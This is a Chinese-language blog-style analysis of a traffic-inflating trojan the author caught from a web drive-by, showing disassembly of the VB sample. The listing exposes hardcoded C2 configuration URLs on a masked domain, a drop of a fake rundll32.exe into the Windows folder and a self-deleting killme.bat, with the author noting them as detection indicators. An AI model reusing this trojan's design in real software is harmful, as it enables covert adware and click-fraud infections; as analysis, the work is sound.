
对一刷网站访问量的小马分析

系统补丁打完,在网上瞎灌水,居然还中了网马,哎!现在把它的网马下载下来,不错,真牛,通杀 Windows 98、Windows NT、Windows 2000、Windows XP、Windows XP SP2、Windows 2003。自己留着,随便分析了下它的木马。一个刷流量的木马。服了。现在小马都出到这个份上了。

脱壳过程略,程序由 VB 编写。

00403DAD   . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>;

msvbvm60.__vbaHresultCheckObj

00403DB3   . 8985 E0FCFFFF MOV DWORD PTR SS:[EBP-320],EAX

00403DB9   . EB 0A       JMP SHORT Rundll32.00403DC5

00403DBB   > C785 E0FCFFFF>MOV DWORD PTR SS:[EBP-320],0

00403DC5   > 8B95 60FEFFFF MOV EDX,DWORD PTR SS:[EBP-1A0]

00403DCB   . 8995 F8FCFFFF MOV DWORD PTR SS:[EBP-308],EDX

00403DD1   . C785 60FEFFFF>MOV DWORD PTR SS:[EBP-1A0],0

00403DDB   . 8B85 F8FCFFFF MOV EAX,DWORD PTR SS:[EBP-308]

00403DE1   . 8985 34FEFFFF MOV DWORD PTR SS:[EBP-1CC],EAX

00403DE7   . C785 2CFEFFFF>MOV DWORD PTR SS:[EBP-1D4],8

00403DF1   . 8D95 2CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1D4]

00403DF7   . 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108]

00403DFD   . FF15 08104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove

00403E03   . C745 FC 06000>MOV DWORD PTR SS:[EBP-4],6

00403E0A   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"

00403E14   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E1E   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E24   . 8D4D A0     LEA ECX,DWORD PTR SS:[EBP-60]

00403E27   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E2D   . C745 FC 07000>MOV DWORD PTR SS:[EBP-4],7

00403E34   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"

00403E3E   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E48   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E4E   . 8D8D 6CFFFFFF LEA ECX,DWORD PTR SS:[EBP-94]

00403E54   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E5A   . C745 FC 08000>MOV DWORD PTR SS:[EBP-4],8

00403E61   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"

00403E6B   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E75   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403E7B   . 8D4D 8C     LEA ECX,DWORD PTR SS:[EBP-74]

00403E7E   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403E84   . C745 FC 09000>MOV DWORD PTR SS:[EBP-4],9

00403E8B   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt"

00403E95   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403E9F   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403EA5   . 8D8D B8FEFFFF LEA ECX,DWORD PTR SS:[EBP-148]

00403EAB   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403EB1   . C745 FC 0A000>MOV DWORD PTR SS:[EBP-4],0A

00403EB8   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>;

UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt"

00403EC2   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403ECC   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403ED2   . 8D8D 7CFFFFFF LEA ECX,DWORD PTR SS:[EBP-84]

00403ED8   . FF15 70114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy

00403EDE   . C745 FC 0B000>MOV DWORD PTR SS:[EBP-4],0B

00403EE5   . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir"

00403EEF   . C785 CCFDFFFF>MOV DWORD PTR SS:[EBP-234],8

00403EF9   . 8D95 CCFDFFFF LEA EDX,DWORD PTR SS:[EBP-234]

00403EFF   . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]

00403F05   . FF15 6C114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>; msvbvm60.__vbaVarDup

00403F0B   . 8D8D 2CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1D4]

00403F11   . 51         PUSH ECX

00403F12   . 8D95 1CFEFFFF LEA EDX,DWORD PTR SS:[EBP-1E4]

00403F18   . 52         PUSH EDX

00403F19   . FF15 60104000 CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar

00403F1F   . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\rundll32.exe"

00403F29   . C785 BCFDFFFF>MOV DWORD PTR SS:[EBP-244],8

程序会从 http://www.xxxxxxxx.com 的 tc 目录读取配置文件,同时访问 tc/MMResult.asp,然后生成文件。从上面通过 rtcEnvironVar 读取 "WinDir" 环境变量、紧接着又出现 "\rundll32.exe" 字符串来看,程序很可能还会在 Windows 目录下以 rundll32.exe 为名落地(此处为推测,需结合后续代码确认);这几个硬编码的 URL 和文件名可作为排查时的网络及文件特征。

00404DA2   . /EB 0A       JMP SHORT Rundll32.00404DAE           //获取文件路径堆栈 

00404DA4   > |C785 88FCFFFF>MOV DWORD PTR SS:[EBP-378],0       

00404DAE   > \8B85 60FEFFFF MOV EAX,DWORD PTR SS:[EBP-1A0]         //我程序路径是 "D:\fuck you" 

00404DB4   . 50         PUSH EAX                         //路径入eax   

00404DB5   . 68 80274000   PUSH Rundll32.00402780             ; //生成killme.bat

00404DBA   . FF15 48104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat

00404DC0   . 8BD0       MOV EDX,EAX                 //文件路径+文件名字D:\fuck you\killme.bat

00404DC2   . 8D8D 5CFEFFFF LEA ECX,DWORD PTR SS:[EBP-1A4]

00404DC8   . FF15 80114000 CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove

00404DCE   . 50         PUSH EAX

00404DCF   . 6A 01       PUSH 1

00404DD1   . 6A FF       PUSH -1

00404DD3   . 6A 02       PUSH 2